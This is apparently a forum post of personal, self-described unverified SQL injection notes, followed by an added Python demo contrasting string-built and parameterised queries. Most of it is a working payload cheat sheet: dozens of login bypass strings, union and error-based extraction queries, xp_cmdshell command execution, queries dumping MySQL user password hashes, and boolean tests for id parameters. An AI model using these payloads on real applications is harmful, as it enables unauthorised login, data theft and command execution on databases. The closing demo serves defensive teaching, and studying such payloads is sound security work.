Prerequisites:
SQL server
I'm doing a little digging further into SQLi, and while I'm by no means a DBA or even all that familiar with SQL, it seems everyone has a cheat sheet nowadays, and I felt the need to have a location for posting a few of my notes. I have not verified any of this info at this time and will be doing that later. For now, I have merely collected some data to look into and am posting it here; feel free to comment on or correct anything that anyone feels or knows is incorrect. If I ever referenced your material somewhere and did not give you credit, please contact me or someone in Soldierx and we will make sure you are added to the references list.
If anyone is looking for an actual tutorial (which this is not, at least not yet), I would refer you to Nu11By73's tutorial here:
https://www.soldierx.com/tutorials/Basic-SQLi-System-Level-Access
SQLI Authentication Bypass Cheat Sheet.
' /*!50000or*/1='1
' /*!or*/1='1
' OR username IS NOT NULL OR username = '
' or 1=1 union select 1,2 as `
' or 1=1#
' or 1=1--
' or 1=1/*
' or 1=1;
' or#newline
' or-- -newline
') or '1'='1--
') or ('1'='1--
) or ('1'='1--
) or '1'='1--
1 AND 1=1
1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
1 AND USER_NAME() = 'dbo'
1 EXEC SP_ (or EXEC XP_)
1 OR 1=1
1 UNI/**/ON SELECT ALL FROM WHERE
1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
1' AND 1=(SELECT COUNT(*) FROM tablenames); --
1' AND non_existant_table = '1
1' OR '1'='1
1') and '1'='1--
1'1
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1='1
1\'1
==
\'; DESC users; --
admin" #
admin" --
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin"/*
admin"or 1=1 or ""="
admin' #
admin' --
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin'/*
admin'or 1=1 or ''='
and 1=1
and 1=1--
hi' or 1=1 --
hi" or 1=1 --
hi" or "a"="a
or 0=0 #
or 0=0 --
or 1=1
or 1=1#
or 1=1--
or 1=1/*
' and 'one'='one
' and 'one'='one--
' or 0=0 #
' or 0=0 --
' or 1=1/* (MySQL < 5.1)
' or 1=1-- -
' or a=a--
' or 'one'='one
' or 'one'='one--
' or 'x'='x
' or '1'='1
'&&1='1
') or ('a'='a
') or ('x'='x
'-'
'='
'or'1=1'
'||1='1
") or ("a"="a
" or 0=0 #
" or 0=0 --
" or 1=1--
" or "a"="a
" or "x"="x
Other notes to look into:
exec master..xp_cmdshell 'dir'
from mysql.user where user
SELECT user, password FROM mysql.user
SELECT user, password FROM mysql.user LIMIT 1,1
SELECT password FROM mysql.user WHERE user = 'root'
SELECT * FROM 'user' WHERE 1 LIMIT 0,30
SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
SELECT * FROM mysql.user
MySQL string escape sequences (character --> escaped form):
NUL (0x00) --> \0 [This is a zero, not the letter O]
BS (0x08) --> \b
TAB (0x09) --> \t
LF (0x0a) --> \n
CR (0x0d) --> \r
SUB (0x1a) --> \Z
" (0x22) --> \"
% (0x25) --> \%
' (0x27) --> \'
\ (0x5c) --> \\
_ (0x5f) --> \_
Error Based SQLi
For integer inputs:
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
For string inputs:
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
The payloads above should raise a 'Duplicate entry' error, and the error message carries the @@VERSION value that was concatenated into the grouping key.
Clear SQLi Tests
These tests are useful for boolean-based SQL injection and silent (blind) attacks: if product.php?id=5-1 returns the same page as product.php?id=4, the parameter is reaching the database unquoted and being evaluated as SQL arithmetic.
product.php?id=4
product.php?id=5-1
product.php?id=4 OR 1=1
product.php?id=-1 OR 17-7=10
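As an added illustration (not from the original post), the following script shows why the authentication bypass strings and the id=5-1 style tests above work against string-built queries and why they fail against parameterised ones. It uses an in-memory SQLite database as a constructed stand-in for MySQL/MSSQL, so MySQL-only syntax such as # comments is not exercised; the users and products tables and the login/product functions are assumptions made for the demo.

```python
import re
import sqlite3

# Constructed stand-in for the real backend: an in-memory SQLite database
# (not MySQL/MSSQL) with the two tables the page's payloads are aimed at.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(4, "widget"), (5, "gadget")])
    return conn

def login_vulnerable(conn, username, password):
    # String concatenation: a quote or comment marker in the input
    # rewrites the WHERE clause, which is what the bypass list relies on.
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, username, password):
    # Parameterised query: the driver binds the values separately, so
    # quotes, -- and /* are compared as literal characters, never parsed.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

def product_vulnerable(conn, raw_id):
    # Unquoted integer context: '5-1' and '4 OR 1=1' are evaluated as SQL,
    # which is exactly what the "clear SQLi tests" above detect.
    sql = "SELECT name FROM products WHERE id = " + raw_id + " ORDER BY id"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def product_safe(conn, raw_id):
    # Validate the type before touching the database, then bind the value.
    if not re.fullmatch(r"[0-9]+", raw_id):
        return None  # reject (and log) anything that is not a plain integer
    row = conn.execute("SELECT name FROM products WHERE id = ?",
                       (int(raw_id),)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    for user, pw in [("admin' --", "x"), ("' or '1'='1", "' or '1'='1")]:
        print(repr(user), login_vulnerable(db, user, pw), login_safe(db, user, pw))
    for raw in ["4", "5-1", "4 OR 1=1", "-1 OR 17-7=10"]:
        print(repr(raw), product_vulnerable(db, raw), product_safe(db, raw))
```

Running it prints True for every bypass string against login_vulnerable and False against login_safe, and shows product_vulnerable returning the id=4 row for 5-1 while product_safe rejects it.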